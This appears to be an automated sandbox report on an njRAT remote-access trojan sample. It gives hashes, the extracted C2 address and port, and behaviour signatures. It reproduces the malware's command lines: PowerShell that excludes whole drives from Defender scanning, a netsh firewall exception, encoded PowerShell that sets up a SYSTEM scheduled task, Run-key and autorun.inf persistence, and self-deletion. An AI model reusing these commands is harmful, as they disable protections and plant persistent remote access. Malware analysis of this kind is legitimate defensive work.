njrat | 0f6084e2d90e3429b34cc2950ca31fde03ffcceb0b1470935e89116d9ed04e1f

Analysis

max time kernel
151s
max time network
154s
platform
windows10-2004_x64
resource
win10v2004-20220414-en
submitted
06-07-2022 22:26

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

0648873dd8d00b2eca5eaa5680f7a5b6.exe
Size

4.9MB
MD5

0648873dd8d00b2eca5eaa5680f7a5b6
SHA1

fada8b49ca5b898c9e31bc87f2b37a267599d406
SHA256

0f6084e2d90e3429b34cc2950ca31fde03ffcceb0b1470935e89116d9ed04e1f
SHA512

88fd72593cb94da497bf5ed7b9e4f35cfac74e9e5280d8d9f0708c6867518c4f0444ab0426ba8f94f86ffbcc3263b83cd6ce436d094bd82ec5e5bc8e4a5908d0

Score

10^/10

njrat hacked evasion persistence suricata trojan

Malware Config

Extracted

Family

njrat

Version

im523

Botnet

HacKed

51.89.91.139:5050

Mutex

5db0afc818875fbd9be3e842f2d3f24b

Attributes

reg_key
5db0afc818875fbd9be3e842f2d3f24b
splitter
|'|'|

Signatures

njRAT/Bladabindi
Widely used RAT written in .NET.
trojan njrat
suricata: ET MALWARE Generic njRAT/Bladabindi CnC Activity (ll)
suricata: ET MALWARE Generic njRAT/Bladabindi CnC Activity (ll)
suricata
Executes dropped EXE 4 IoCs

Processes:

Server.exedriver.exeGoogleChromer.exeupdater.exe

pid process

4340 Server.exe
3900 driver.exe
1404 GoogleChromer.exe
2732 updater.exe
Modifies Windows Firewall 1 TTPs 1 IoCs
evasion

Modify Existing Service
T1031

Processes:

netsh.exe

pid process

4768 netsh.exe

pid	process
4340	Server.exe
3900	driver.exe
1404	GoogleChromer.exe
2732	updater.exe

pid	process
4768	netsh.exe

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

Server.exedriver.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000\Control Panel\International\Geo\Nation	Server.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000\Control Panel\International\Geo\Nation	driver.exe

Drops startup file 2 IoCs

Processes:

GoogleChromer.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\5db0afc818875fbd9be3e842f2d3f24b.exe	GoogleChromer.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\5db0afc818875fbd9be3e842f2d3f24b.exe	GoogleChromer.exe

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

GoogleChromer.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\5db0afc818875fbd9be3e842f2d3f24b = "\"C:\\Users\\Admin\\AppData\\Roaming\\GoogleChromer.exe\" .."	GoogleChromer.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\5db0afc818875fbd9be3e842f2d3f24b = "\"C:\\Users\\Admin\\AppData\\Roaming\\GoogleChromer.exe\" .."	GoogleChromer.exe

Drops autorun.inf file 1 TTPs 3 IoCs

Malware can abuse Windows Autorun to spread further via attached volumes.

Replication Through Removable Media

T1091

Processes:

GoogleChromer.exe

description	ioc	process
File created	C:\autorun.inf	GoogleChromer.exe
File opened for modification	C:\autorun.inf	GoogleChromer.exe
File created	D:\autorun.inf	GoogleChromer.exe

Drops file in System32 directory 3 IoCs

Processes:

powershell.EXEupdater.exe

description	ioc	process
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.EXE
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log	powershell.EXE
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\updater.exe.log	updater.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 4 IoCs

Processes:

driver.exeupdater.exe

pid process

3900 driver.exe
3900 driver.exe
2732 updater.exe
2732 updater.exe

pid	process
3900	driver.exe
3900	driver.exe
2732	updater.exe
2732	updater.exe

Drops file in Program Files directory 2 IoCs

Processes:

powershell.exe

description	ioc	process
File created	C:\Program Files\Google\Chrome\updater.exe	powershell.exe
File opened for modification	C:\Program Files\Google\Chrome\updater.exe	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Modifies data under HKEY_USERS 46 IoCs

Processes:

powershell.EXE

description	ioc	process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.EXE
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	powershell.EXE
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.EXE
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.EXE
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	powershell.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

powershell.exepowershell.exedriver.exepowershell.exepowershell.exepowershell.EXEupdater.exeGoogleChromer.exe

pid	process
408	powershell.exe
408	powershell.exe
4388	powershell.exe
3900	driver.exe
3900	driver.exe
4388	powershell.exe
3900	driver.exe
4936	powershell.exe
4936	powershell.exe
2420	powershell.exe
2420	powershell.exe
3840	powershell.EXE
3840	powershell.EXE
2732	updater.exe
2732	updater.exe
2732	updater.exe
1404	GoogleChromer.exe
1404	GoogleChromer.exe
1404	GoogleChromer.exe
1404	GoogleChromer.exe
1404	GoogleChromer.exe
1404	GoogleChromer.exe
1404	GoogleChromer.exe
1404	GoogleChromer.exe
1404	GoogleChromer.exe
1404	GoogleChromer.exe
1404	GoogleChromer.exe
1404	GoogleChromer.exe
1404	GoogleChromer.exe
1404	GoogleChromer.exe
1404	GoogleChromer.exe
1404	GoogleChromer.exe
1404	GoogleChromer.exe
1404	GoogleChromer.exe
1404	GoogleChromer.exe
1404	GoogleChromer.exe
1404	GoogleChromer.exe
1404	GoogleChromer.exe
1404	GoogleChromer.exe
1404	GoogleChromer.exe
1404	GoogleChromer.exe
1404	GoogleChromer.exe
1404	GoogleChromer.exe
1404	GoogleChromer.exe
1404	GoogleChromer.exe
1404	GoogleChromer.exe
1404	GoogleChromer.exe
1404	GoogleChromer.exe
1404	GoogleChromer.exe
1404	GoogleChromer.exe
1404	GoogleChromer.exe
1404	GoogleChromer.exe
1404	GoogleChromer.exe
1404	GoogleChromer.exe
1404	GoogleChromer.exe
1404	GoogleChromer.exe
1404	GoogleChromer.exe
1404	GoogleChromer.exe
1404	GoogleChromer.exe
1404	GoogleChromer.exe
1404	GoogleChromer.exe
1404	GoogleChromer.exe
1404	GoogleChromer.exe
1404	GoogleChromer.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

GoogleChromer.exe

pid process

1404 GoogleChromer.exe

pid	process
1404	GoogleChromer.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

powershell.exepowershell.exedriver.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	408	powershell.exe
Token: SeDebugPrivilege	4388	powershell.exe
Token: SeDebugPrivilege	3900	driver.exe
Token: SeDebugPrivilege	4936	powershell.exe
Token: SeIncreaseQuotaPrivilege	4936	powershell.exe
Token: SeSecurityPrivilege	4936	powershell.exe
Token: SeTakeOwnershipPrivilege	4936	powershell.exe
Token: SeLoadDriverPrivilege	4936	powershell.exe
Token: SeSystemProfilePrivilege	4936	powershell.exe
Token: SeSystemtimePrivilege	4936	powershell.exe
Token: SeProfSingleProcessPrivilege	4936	powershell.exe
Token: SeIncBasePriorityPrivilege	4936	powershell.exe
Token: SeCreatePagefilePrivilege	4936	powershell.exe
Token: SeBackupPrivilege	4936	powershell.exe
Token: SeRestorePrivilege	4936	powershell.exe
Token: SeShutdownPrivilege	4936	powershell.exe
Token: SeDebugPrivilege	4936	powershell.exe
Token: SeSystemEnvironmentPrivilege	4936	powershell.exe
Token: SeRemoteShutdownPrivilege	4936	powershell.exe
Token: SeUndockPrivilege	4936	powershell.exe
Token: SeManageVolumePrivilege	4936	powershell.exe
Token: 33	4936	powershell.exe
Token: 34	4936	powershell.exe
Token: 35	4936	powershell.exe
Token: 36	4936	powershell.exe
Token: SeIncreaseQuotaPrivilege	4936	powershell.exe
Token: SeSecurityPrivilege	4936	powershell.exe
Token: SeTakeOwnershipPrivilege	4936	powershell.exe
Token: SeLoadDriverPrivilege	4936	powershell.exe
Token: SeSystemProfilePrivilege	4936	powershell.exe
Token: SeSystemtimePrivilege	4936	powershell.exe
Token: SeProfSingleProcessPrivilege	4936	powershell.exe
Token: SeIncBasePriorityPrivilege	4936	powershell.exe
Token: SeCreatePagefilePrivilege	4936	powershell.exe
Token: SeBackupPrivilege	4936	powershell.exe
Token: SeRestorePrivilege	4936	powershell.exe
Token: SeShutdownPrivilege	4936	powershell.exe
Token: SeDebugPrivilege	4936	powershell.exe
Token: SeSystemEnvironmentPrivilege	4936	powershell.exe
Token: SeRemoteShutdownPrivilege	4936	powershell.exe
Token: SeUndockPrivilege	4936	powershell.exe
Token: SeManageVolumePrivilege	4936	powershell.exe
Token: 33	4936	powershell.exe
Token: 34	4936	powershell.exe
Token: 35	4936	powershell.exe
Token: 36	4936	powershell.exe
Token: SeIncreaseQuotaPrivilege	4936	powershell.exe
Token: SeSecurityPrivilege	4936	powershell.exe
Token: SeTakeOwnershipPrivilege	4936	powershell.exe
Token: SeLoadDriverPrivilege	4936	powershell.exe
Token: SeSystemProfilePrivilege	4936	powershell.exe
Token: SeSystemtimePrivilege	4936	powershell.exe
Token: SeProfSingleProcessPrivilege	4936	powershell.exe
Token: SeIncBasePriorityPrivilege	4936	powershell.exe
Token: SeCreatePagefilePrivilege	4936	powershell.exe
Token: SeBackupPrivilege	4936	powershell.exe
Token: SeRestorePrivilege	4936	powershell.exe
Token: SeShutdownPrivilege	4936	powershell.exe
Token: SeDebugPrivilege	4936	powershell.exe
Token: SeSystemEnvironmentPrivilege	4936	powershell.exe
Token: SeRemoteShutdownPrivilege	4936	powershell.exe
Token: SeUndockPrivilege	4936	powershell.exe
Token: SeManageVolumePrivilege	4936	powershell.exe
Token: 33	4936	powershell.exe

Suspicious use of WriteProcessMemory 43 IoCs

Processes:

0648873dd8d00b2eca5eaa5680f7a5b6.execmd.execmd.execmd.execmd.exedriver.execmd.exeServer.exepowershell.EXEupdater.exeGoogleChromer.exe

description	pid	process	target process
PID 2912 wrote to memory of 3104	2912	0648873dd8d00b2eca5eaa5680f7a5b6.exe	cmd.exe
PID 2912 wrote to memory of 3104	2912	0648873dd8d00b2eca5eaa5680f7a5b6.exe	cmd.exe
PID 2912 wrote to memory of 3104	2912	0648873dd8d00b2eca5eaa5680f7a5b6.exe	cmd.exe
PID 3104 wrote to memory of 408	3104	cmd.exe	powershell.exe
PID 3104 wrote to memory of 408	3104	cmd.exe	powershell.exe
PID 3104 wrote to memory of 408	3104	cmd.exe	powershell.exe
PID 2912 wrote to memory of 1804	2912	0648873dd8d00b2eca5eaa5680f7a5b6.exe	cmd.exe
PID 2912 wrote to memory of 1804	2912	0648873dd8d00b2eca5eaa5680f7a5b6.exe	cmd.exe
PID 2912 wrote to memory of 1804	2912	0648873dd8d00b2eca5eaa5680f7a5b6.exe	cmd.exe
PID 1804 wrote to memory of 4388	1804	cmd.exe	powershell.exe
PID 1804 wrote to memory of 4388	1804	cmd.exe	powershell.exe
PID 1804 wrote to memory of 4388	1804	cmd.exe	powershell.exe
PID 2912 wrote to memory of 4148	2912	0648873dd8d00b2eca5eaa5680f7a5b6.exe	cmd.exe
PID 2912 wrote to memory of 4148	2912	0648873dd8d00b2eca5eaa5680f7a5b6.exe	cmd.exe
PID 2912 wrote to memory of 4148	2912	0648873dd8d00b2eca5eaa5680f7a5b6.exe	cmd.exe
PID 2912 wrote to memory of 2948	2912	0648873dd8d00b2eca5eaa5680f7a5b6.exe	cmd.exe
PID 2912 wrote to memory of 2948	2912	0648873dd8d00b2eca5eaa5680f7a5b6.exe	cmd.exe
PID 2912 wrote to memory of 2948	2912	0648873dd8d00b2eca5eaa5680f7a5b6.exe	cmd.exe
PID 2948 wrote to memory of 4340	2948	cmd.exe	Server.exe
PID 2948 wrote to memory of 4340	2948	cmd.exe	Server.exe
PID 2948 wrote to memory of 4340	2948	cmd.exe	Server.exe
PID 4148 wrote to memory of 3900	4148	cmd.exe	driver.exe
PID 4148 wrote to memory of 3900	4148	cmd.exe	driver.exe
PID 3900 wrote to memory of 4936	3900	driver.exe	powershell.exe
PID 3900 wrote to memory of 4936	3900	driver.exe	powershell.exe
PID 1804 wrote to memory of 2420	1804	cmd.exe	powershell.exe
PID 1804 wrote to memory of 2420	1804	cmd.exe	powershell.exe
PID 1804 wrote to memory of 2420	1804	cmd.exe	powershell.exe
PID 3900 wrote to memory of 520	3900	driver.exe	cmd.exe
PID 3900 wrote to memory of 520	3900	driver.exe	cmd.exe
PID 520 wrote to memory of 3152	520	cmd.exe	choice.exe
PID 520 wrote to memory of 3152	520	cmd.exe	choice.exe
PID 4340 wrote to memory of 1404	4340	Server.exe	GoogleChromer.exe
PID 4340 wrote to memory of 1404	4340	Server.exe	GoogleChromer.exe
PID 4340 wrote to memory of 1404	4340	Server.exe	GoogleChromer.exe
PID 3840 wrote to memory of 2732	3840	powershell.EXE	updater.exe
PID 3840 wrote to memory of 2732	3840	powershell.EXE	updater.exe
PID 2732 wrote to memory of 1004	2732	updater.exe	conhost.exe
PID 2732 wrote to memory of 1004	2732	updater.exe	conhost.exe
PID 2732 wrote to memory of 1004	2732	updater.exe	conhost.exe
PID 1404 wrote to memory of 4768	1404	GoogleChromer.exe	netsh.exe
PID 1404 wrote to memory of 4768	1404	GoogleChromer.exe	netsh.exe
PID 1404 wrote to memory of 4768	1404	GoogleChromer.exe	netsh.exe

C:\Users\Admin\AppData\Local\Temp\0648873dd8d00b2eca5eaa5680f7a5b6.exe
"C:\Users\Admin\AppData\Local\Temp\0648873dd8d00b2eca5eaa5680f7a5b6.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:2912

C:\Windows\SysWOW64\cmd.exe
cmd /c powershell -Command "Add-Type -AssemblyName System.Windows.Forms;[System.Windows.Forms.MessageBox]::Show('Failed! MSVPC1400.dll is missing!','Error','OK','Error')"
2⤵
- Suspicious use of WriteProcessMemory
PID:3104

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Add-Type -AssemblyName System.Windows.Forms;[System.Windows.Forms.MessageBox]::Show('Failed! MSVPC1400.dll is missing!','Error','OK','Error')"
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:408

C:\Windows\SysWOW64\cmd.exe
cmd /c powershell -Command "Add-MpPreference -ExclusionPath @($env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit
2⤵
- Suspicious use of WriteProcessMemory
PID:1804

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Add-MpPreference -ExclusionPath @($env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4388

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"
3⤵
- Suspicious behavior: EnumeratesProcesses
PID:2420

C:\Windows\SysWOW64\cmd.exe
cmd /c start "" "C:\Users\Admin\AppData\Local\Temp\driver.exe"
2⤵
- Suspicious use of WriteProcessMemory
PID:4148

C:\Users\Admin\AppData\Local\Temp\driver.exe
"C:\Users\Admin\AppData\Local\Temp\driver.exe"
3⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3900

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHcAcAAjAD4AIABSAGUAZwBpAHMAdABlAHIALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrACAALQBBAGMAdABpAG8AbgAgACgATgBlAHcALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrAEEAYwB0AGkAbwBuACAALQBFAHgAZQBjAHUAdABlACAAJwBwAG8AdwBlAHIAcwBoAGUAbABsACcAIAAtAEEAcgBnAHUAbQBlAG4AdAAgACcALQBFAG4AYwBvAGQAZQBkAEMAbwBtAG0AYQBuAGQAIAAiAFAAQQBBAGoAQQBHAGcAQQBiAFEAQQBqAEEARAA0AEEASQBBAEIAVABBAEgAUQBBAFkAUQBCAHkAQQBIAFEAQQBMAFEAQgBRAEEASABJAEEAYgB3AEIAagBBAEcAVQBBAGMAdwBCAHoAQQBDAEEAQQBMAFEAQgBHAEEARwBrAEEAYgBBAEIAbABBAEYAQQBBAFkAUQBCADAAQQBHAGcAQQBJAEEAQQBuAEEARQBNAEEATwBnAEIAYwBBAEYAQQBBAGMAZwBCAHYAQQBHAGMAQQBjAGcAQgBoAEEARwAwAEEASQBBAEIARwBBAEcAawBBAGIAQQBCAGwAQQBIAE0AQQBYAEEAQgBIAEEARwA4AEEAYgB3AEIAbgBBAEcAdwBBAFoAUQBCAGMAQQBFAE0AQQBhAEEAQgB5AEEARwA4AEEAYgBRAEIAbABBAEYAdwBBAGQAUQBCAHcAQQBHAFEAQQBZAFEAQgAwAEEARwBVAEEAYwBnAEEAdQBBAEcAVQBBAGUAQQBCAGwAQQBDAGMAQQBJAEEAQQB0AEEARgBZAEEAWgBRAEIAeQBBAEcASQBBAEkAQQBCAFMAQQBIAFUAQQBiAGcAQgBCAEEASABNAEEASQBBAEEAOABBAEMATQBBAGIAUQBCAHEAQQBIAEEAQQBJAHcAQQArAEEAQQA9AD0AIgAnACkAIAA8ACMAZQBsAHMAIwA+ACAALQBUAHIAaQBnAGcAZQByACAAKABOAGUAdwAtAFMAYwBoAGUAZAB1AGwAZQBkAFQAYQBzAGsAVAByAGkAZwBnAGUAcgAgAC0AQQB0AFMAdABhAHIAdAB1AHAAKQAgADwAIwBsAHgAZwB0ACMAPgAgAC0AUwBlAHQAdABpAG4AZwBzACAAKABOAGUAdwAtAFMAYwBoAGUAZAB1AGwAZQBkAFQAYQBzAGsAUwBlAHQAdABpAG4AZwBzAFMAZQB0ACAALQBBAGwAbABvAHcAUwB0AGEAcgB0AEkAZgBPAG4AQgBhAHQAdABlAHIAaQBlAHMAIAAtAEQAaQBzAGEAbABsAG8AdwBIAGEAcgBkAFQAZQByAG0AaQBuAGEAdABlACAALQBEAG8AbgB0AFMAdABvAHAASQBmAEcAbwBpAG4AZwBPAG4AQgBhAHQAdABlAHIAaQBlAHMAIAAtAEQAbwBuAHQAUwB0AG8AcABPAG4ASQBkAGwAZQBFAG4AZAAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AVABpAG0AZQBMAGkAbQBpAHQAIAAoAE4AZQB3AC0AVABpAG0AZQBTAHAAYQBuACAALQBEAGEAeQBzACAAMQAwADAAMAApACkAIAA8ACMAdQB4AHYAIwA+ACAALQBUAGEAcwBrAE4AYQBtAGUAIAAnAEcAbwBvAGcAbABlAFUAcABkAGEAdABlAFQAYQBzAGsATQBhAGMAaABpAG4AZQBRAEMAJwAgAC0AVQBzAGUAcgAgACcAUwB5AHMAdABlAG0AJwAgAC0AUgB1AG4ATABlAHYAZQBsACAAJwBIAGkAZwBoAGUAcwB0ACcAIAAtAEYAbwByAGMAZQAgADwAIwByAG8AbABhACMAPgA7ACAAQwBvAHAAeQAtAEkAdABlAG0AIAAnAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAXABUAGUAbQBwAFwAZAByAGkAdgBlAHIALgBlAHgAZQAnACAALQBEAGUAcwB0AGkAbgBhAHQAaQBvAG4AIAAnAEMAOgBcAFAAcgBvAGcAcgBhAG0AIABGAGkAbABlAHMAXABHAG8AbwBnAGwAZQBcAEMAaAByAG8AbQBlAFwAdQBwAGQAYQB0AGUAcgAuAGUAeABlACcAIAAtAEYAbwByAGMAZQAgADwAIwBpAGoAdQB1ACMAPgA7ACAAUwB0AGEAcgB0AC0AUwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawAgADwAIwBhAHUAYQBlACMAPgAgAC0AVABhAHMAawBOAGEAbQBlACAAJwBHAG8AbwBnAGwAZQBVAHAAZABhAHQAZQBUAGEAcwBrAE0AYQBjAGgAaQBuAGUAUQBDACcAOwA="
4⤵
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4936

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\driver.exe"
4⤵
- Suspicious use of WriteProcessMemory
PID:520

C:\Windows\system32\choice.exe
choice /C Y /N /D Y /T 3
5⤵
PID:3152

C:\Windows\SysWOW64\cmd.exe
cmd /c start "" "C:\Users\Admin\AppData\Local\Temp\Server.exe"
2⤵
- Suspicious use of WriteProcessMemory
PID:2948

C:\Users\Admin\AppData\Local\Temp\Server.exe
"C:\Users\Admin\AppData\Local\Temp\Server.exe"
3⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4340

C:\Users\Admin\AppData\Roaming\GoogleChromer.exe
"C:\Users\Admin\AppData\Roaming\GoogleChromer.exe"
4⤵
- Executes dropped EXE
- Drops startup file
- Adds Run key to start application
- Drops autorun.inf file
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of WriteProcessMemory
PID:1404

C:\Windows\SysWOW64\netsh.exe
netsh firewall add allowedprogram "C:\Users\Admin\AppData\Roaming\GoogleChromer.exe" "GoogleChromer.exe" ENABLE
5⤵
- Modifies Windows Firewall
PID:4768

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -EncodedCommand "PAAjAGgAbQAjAD4AIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAAnAEMAOgBcAFAAcgBvAGcAcgBhAG0AIABGAGkAbABlAHMAXABHAG8AbwBnAGwAZQBcAEMAaAByAG8AbQBlAFwAdQBwAGQAYQB0AGUAcgAuAGUAeABlACcAIAAtAFYAZQByAGIAIABSAHUAbgBBAHMAIAA8ACMAbQBqAHAAIwA+AA=="
1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3840

C:\Program Files\Google\Chrome\updater.exe
"C:\Program Files\Google\Chrome\updater.exe"
2⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2732

C:\Windows\System32\conhost.exe
C:\Windows\System32\conhost.exe "nhetcxofc"
3⤵
PID:1004

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Replication Through Removable Media

T1091

Execution

Persistence

Modify Existing Service

T1031

Registry Run Keys / Startup Folder

T1060

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Replication Through Removable Media

T1091

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files\Google\Chrome\updater.exe
Filesize
4.9MB

MD5
1528714ebf9ec93106e200719e94239f

SHA1
9321ca4531d1384bcb8f9d95b574148dbd8e8a4a

SHA256
064331c558242898b53bbbfe2ef22bc0bb908ffa5a106fe3f45866acfccfae5c

SHA512
